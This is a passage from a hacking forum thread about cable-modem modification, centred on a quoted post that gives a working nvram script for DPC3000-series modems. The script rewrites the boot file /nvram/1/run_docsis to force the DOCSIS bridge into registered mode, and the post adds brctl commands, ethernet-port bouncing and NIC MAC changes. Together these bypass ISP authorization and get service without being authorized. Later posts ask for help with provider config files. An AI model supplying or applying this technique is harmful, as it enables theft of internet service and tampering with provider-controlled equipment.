Haxorware Forums

Full Version: Sbhacker
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7
ok ,, still nice for others too have a look at the info aswell SOZ
I hear ya, but 'Other's' can view it here already, why put it on a site where I was banned? Nae worrie's mate, just remind's me not to be so hasty in providing any further files Sad
(17-06-2015, 10:00 PM)Canis-Major Wrote: [ -> ]I hear ya, but 'Other's' can view it here already, why put it on a site where I was banned? Nae worrie's mate, just remind's me not to be so hasty in providing any further files Sad

You still can, just don't let Andy see them....
To answer ethic's, sorry, but I was very distracted in heat, to answer, it would be best to just post my inf, and let you decide, personally I'd say it's the puma 5 version of canned registration, making modem connection appear operational, now with a little redirect here and a tftp there, yes, it is a key. The modem is on. Use forwarding. (ecos version)

The new security is this image. the magic mirror, ever so slightly bigger than the mirror reflected within.

Operational but no ip anyone?

Same thing, only external.

Figure it out.
Haha...you sound like Jesus with his parables/riddles......
Pmsl, Yeah, I do like to make folks see thing's alternatively..

Here is the origional txt, was this deleted from sbh?

This script replaces a file that is run by all the 3000 modem's firmware when the modem boots:

It then forces the modem online:

# cat run_docsis
runall -D 4 -U 4
#
#
# cat /nvram/1/run_docsis
runall -D 4 -U 4
# echo '#!/bin/sh
> runall -D 4 -U 4
> sleep 90
> echo registered > /proc/net/dbrctl/mode
>
> sleep 5
> brctl stp br0 on' > /nvram/1/run_docsis
#!/bin/sh
runall -D 4 -U 4
sleep 90
echo registered > /proc/net/dbrctl/mode

sleep 5
brctl stp br0 on
#

This does not force config's or look at any of the settings as in the alpha firmware.

This is a fully standalone nvram only hack that depends on the fact that the startup file in etc/init.d/rcS calls the script located in nvram/1/run_docsis on all the 3000 firmwares I've seen.

This is tested on stock firmware:dpc3000-v301r2372 and the latest one dev posted for comcast:dpc3000-v303r2391-100514aCMCST.bin.

I have stock on image1 and the new gui comcast one on image2 and it works for both.

This will work on all the puma firmwares, however the script name and location will vary.

To see what it is doing:

There are two things you need to force the modem online.

You must tell the correct process to register the docsis.

# cat /proc/net/dbrctl/show

Docsis bridge mode is: 1 (0=off; 1=reg; 2=pre reg; 3=standby)
--------------------------------------------------------------
index Interface Type
0 cni0 CABLE
1 lbr0 CMCI
2 lan0 LAN IP
3 wan0 WAN IP
--------------------------------------------------------------

Esafe configuration
-------------------

0= Modem not synced up or connected.
1= ONLINE (What your goal is)
2= Pre-Reg, This is where your stuck when BPI failed and your modem looks like it's online and the web interface shows BPI auth in progress.
3= Standby, never put the modem in standby
4= MAC invalid and the config file downloaded is not valid. Not Authorized.

This command will make it 1-Registered.

Then you must activate the docsis bridge with brctl command.
Here are all the options with this command:

# brctl --?
never heard of command [--?]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> <state> turn stp on/off
#

If you show the bridge then turn it on, you should have connectivity, if everything else in Prodset is set correctly. You don't have to worry about spoofing anything as you can LET the ISP update the firmware and keep the latest version.

# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.000102030405 no eth0
lbr0
# brctl stp br0 on
# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.000102030405 yes eth0
lbr0
#

+
-

still trying to figure out how to make this automatic, but if i do this manually, and then change my mac address of my nic card when i get

Cable Modem Status: BPI_INIT

it will jump online!

How can i get this so thats its done by the script? when i run cat /nvram/1/run_docsis i get the following output

#!/bin/sh

runall -D 4 -U 4

sleep 90
sleep 5
brctl stp br0 on

Bounce the Ethernet port:

ifconfig eth0 down
ifconfig eth0 up

Or if you were to pull the ethernet cable out of the modem and reinsert it, it would do the same thing

still trying to figure out how to make this automatic, but if i do this manually, and then change my mac address of my nic card when i get

Cable Modem Status: BPI_INIT

it will jump online!

How can i get this so thats its done by the script? when i run cat /nvram/1/run_docsis i get the following output

#!/bin/sh

runall -D 4 -U 4

sleep 90
sleep 5
brctl stp br0 on

thanks in advance

That means you edited it correctly. Otherwise it would just say: runall -D 4 -U 4 and nothing else.

Thank you for your co-operation Smile

Notice after andy m posted it on sbh, those that think they know dont know that this was from there? Idiot's! (jokingly Smile)

And as for sorn53 and docsis-devil claiming I never told them anything, I posted this there, and all they could do was ask for some 4 liner.. ouch.. as tested by dev-delay
good night, first of all greetings and a pleasure to belong to your forum, from panama, I am struggling to see about the config file, they are dynamic, I think the same system worldwide that implemented that, I have cm 5101 with haxor online but 512 kb, I will be totally grateful to you, I know there is info about the config that cannot be given but I will use it for my own use
Pages: 1 2 3 4 5 6 7